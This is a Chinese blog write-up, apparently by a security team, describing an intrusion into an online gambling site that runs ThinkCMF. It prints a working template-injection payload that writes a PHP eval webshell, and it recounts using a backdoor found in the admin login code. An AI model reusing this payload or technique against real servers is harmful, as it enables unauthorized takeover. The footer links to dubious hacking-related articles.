渗透小计之「竟然有人在网赌平台代码里下毒」

访客4年前黑客文章714

print by 猩猩安全团队——作者:hurnme、flyingdemon

引言

记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程

确定目标CMS

拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。

1608950324_5fe6a23450ebaf27b1806.png!small?1608950324080

进去之后在url处构造报错

1608949555_5fe69f33c999ae566e1cd.png!small?1608949555635

写入一句话

查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" ***  *** 521"]);?>')</php>

写入shell之后连接蚁剑,直接拿下

1608949768_5fe6a008065c146cdc01d.png!small?1608949767848

鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!

1608950091_5fe6a14bedb97de6b3050.png!small?1608950091964

进入♂后台

一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。

正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。

1608950289_5fe6a211ecb71294db37e.png!small?1608950289732

这。。。这TM。。。有人在代码里下毒。

拿着不知道是哪位好心人留下的后门,含泪登录了后台。

1608950667_5fe6a38b3a8f9a6467892.png!small?1608950667016

帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。


相关文章

win10开机密码忘记按f2(教你破解Win10开机密码)

划重点: 重置电脑开机密码一共分成三个流程「 制做PE系统软件」「进到PE系统软件 」「密码重置 」;本方式是协助客户重设自身的电脑上开机密码,切勿用以其他非法途径!!! 开机重置密码方式以下:...

2020年全国彩礼数据出炉结不起婚

我们中国人完婚,除开注重门不当户不对以外,还注重“诚心满满的”。当然,除开2个新手中间的情感以外,我国从古至今的传统式“彩礼钱”也十分关键。 日常生活常常见到,由于彩礼钱建议不和而一拍两散的新...

怎么查我家老公的微信聊天记录

亲喂母乳时,新生儿的奶量需多少?或喂奶方式如何做,才能让妈咪喂奶不疲累、宝宝也能充分吸收?透过本篇章让妈咪在哺喂路上更得心应手。其实只要细心的观察,就能发现宝宝的习惯了哦,下面友谊长存的小编为大家分享...

黑客接单的网站_网赌可以找黑客帮忙吗

然后装置2月2019年,云服务器或许会遇到大费事。 其实,云服务器从2018年开端就现已变成了加密钱银挖矿木马的首要进犯方针,尽管加密钱银的价值现已大不如前,但关于违法分子们来说这依然是有利可图的。...

中方发起黑客行动窃取他国知识产权和商业机密?外交部明确回应_公安局

央视网消息:2月12日,外交部举行例行记者会,发言人华春莹主持会议并回答中外记者提问。问:近期有报道称,一些为中国国家安全部门工作的黑客入侵了挪威软件公司,称这是中方发起“云端跳跃”(Cloudhop...

怎么写文赚钱?新手如何靠写文章赚钱

怎么写文赚钱?新手如何靠写文章赚钱

大家好,这里是笑薇读书,今天我将和大家继续共读《写作是最好的自我投资》。在上一节中,我们讲到了写好职场干货文的方法和技巧,今天我将和大家分享最后一节内容:爆款文究竟应该怎么写?   通过今天的阅读...